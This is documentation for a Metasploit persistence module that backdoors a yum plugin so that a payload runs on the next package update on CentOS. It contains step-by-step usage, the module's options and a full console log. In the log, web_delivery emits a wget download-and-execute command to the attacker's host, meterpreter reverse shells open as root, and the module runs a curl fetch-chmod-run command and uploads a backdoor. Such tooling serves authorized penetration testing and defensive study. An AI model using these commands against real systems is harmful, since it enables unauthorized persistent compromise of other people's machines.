## Description This module will run a payload when the package manager is used. This module modifies a yum plugin to launch a binary of choice. `grep -F 'enabled=1' /etc/yum/pluginconf.d/` will show what plugins are currently enabled on the system. root persmissions are likely required. Verified on Centos 7.1 ## Verification Steps 1. Exploit a box that uses Yum 2. `use exploit/linux/persistence/yum_package_manager` 3. `set SESSION ` 4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed 5. `exploit` When the system runs yum update the payload will launch. You must set handler accordingly. ## Options ### PAYLOAD_NAME Name of backdoor executable ### PLUGIN Name of the yum plugin to target ### PluginPath Plugin path to use default is (`/usr/lib/yum-plugins/`) ## Scenarios ### Tested on Centos 7.1 Initial access vector via web delivery ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111 lhost => 111.111.1.111 resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload python/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set srvport 8181 srvport => 8181 resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4545 lport => 4545 resource (/root/.msf4/msfconsole.rc)> set URIPATH l URIPATH => l resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Starting persistent handler(s)... [*] Started reverse TCP handler on 111.111.1.111:4545 [*] Using URL: http://111.111.1.111:8181/l [*] Server started. [*] Run the following command on the target machine: wget -qO KOiqZchh --no-check-certificate http://111.111.1.111:8181/l; chmod +x KOiqZchh; ./KOiqZchh& disown [msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 192.168.2.100 [*] Meterpreter session 1 opened (111.111.1.111:4545 -> 192.168.2.100:34470) at 2025-02-16 11:30:09 -0500 [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/yum_package_manager [*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp [msf](Jobs:2 Agents:2) exploit(linux/persistence/yum_package_manager) > sessions -i 1 [*] Starting interaction with 1... (Meterpreter 1)(/home/centos) > getuid Server username: root (Meterpreter 1)(/home/centos) > sysinfo Computer : centos71.localdomain OS : CentOS 7.9.2009 (Linux 3.10.0-1160.53.1.el7.x86_64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux (Meterpreter 1)(/home/centos) > background [*] Backgrounding session 1... ``` Persistence ``` [msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > set session 1 session => 1 [msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > exploit [*] Command to run on remote host: curl -so ./lgtOaZox http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./lgtOaZox;./lgtOaZox& [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [msf](Jobs:2 Agents:1) exploit(linux/persistence/yum_package_manager) > [*] Fetch handler listening on 111.111.1.111:8080 [*] HTTP server started [*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg [*] Started reverse TCP handler on 111.111.1.111:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 222.222.2.222 [+] Plugins are enabled! [*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:53880) at 2025-02-16 11:30:59 -0500 [!] The service is running, but could not be validated. yum installed and plugin found, enabled, and backdoorable [*] Attempting to modify plugin [*] Backdoor uploaded to /tmp/7EtplboZD [+] Backdoor will run on next Yum update [*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/centos71.localdomain_20250216.3101/centos71.localdomain_20250216.3101.rc ```